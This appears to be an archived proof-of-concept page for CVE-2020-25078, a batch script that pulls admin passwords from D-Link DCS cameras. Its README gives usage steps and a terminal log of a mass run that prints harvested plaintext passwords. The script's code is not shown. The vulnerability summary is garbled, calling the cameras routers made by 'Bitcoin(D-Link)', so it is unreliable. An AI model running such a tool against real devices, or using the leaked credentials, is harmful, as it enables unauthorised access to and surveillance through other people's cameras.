Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2020-25078 PoC — D-Link DCS-2530L和DCS-2670L 安全漏洞

Source
Associated Vulnerability
Title:D-Link DCS-2530L和DCS-2670L 安全漏洞 (CVE-2020-25078)
Description:D-Link DCS-2670L和D-Link DCS-2530L都是Bitcoin(D-Link)组织的一款无线路由器。 D-Link DCS-2530L 1.06.01 Hotfix之前版本和DCS-2670L 2.02版本及之前版本中存在安全漏洞。该漏洞会导致远程管理员密码泄露。
Description
CVE-2020-25078账号密码信息泄露批量脚本Batch script of D-Link DCS series camera account password information disclosure
Readme
# CVE-2020-25078

# 使用说明
# instructions
攻击url放同一目录下 ip.txt

The attack IP is placed in the same directory as ip.txt

# Terminal log
root@localhost:~/CVE-2020-25078#ls

CVE-2020-25078.py
ip.txt


root@localhost:~/CVE-2020-25078#cat ./ip.txt

https://xxx.xxx.xxx.xxx:3128

http://xxx.xxx.xxx.xxx:80

https://xxx.xxx.xxx.xxx:8080

https://xxx.xxx.xxx.xxx:443


root@localhost:~/CVE-2020-25078#python3 ./CVE-2020-25078.py

Start Running Exploit...

[+Login URL]==> http://xxx.xxx.xxx.xxx:80
UserName: ['admin']      PassWord: ['Sruthimina123']


[+Login URL]==> http://xxx.xxx.xxx.xxx:443
UserName: ['admin']      PassWord: ['ming502219']


root@localhost:~/CVE-2020-25078# ls -l

CVE-2020-25078.py

exploit_ok.txt

ip.txt

README.md


root@localhost:~/CVE-2020-25078# cat ./exploit_ok.txt


[+Login URL]==>http://xxx.xxx.xxx.xxx:80
[+UserName]==>['admin'] [+PassWord]==>['Sruthimina123']

[+Login URL]==>http://xxx.xxx.xxx.xxx:443
[+UserName]==>['admin'] [+PassWord]==>['ming502219']

root@localhost:~/CVE-2020-25078#


# 免责声明
# Disclaimers

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article shall be borne by the user himself, and the author shall not bear any responsibility for this.
File Snapshot

[4.0K] /data/pocs/9738e22bbae84c024b2d7b968d9372c2a07e2d87 ├── [1.7K] CVE-2020-25078.py └── [1.4K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.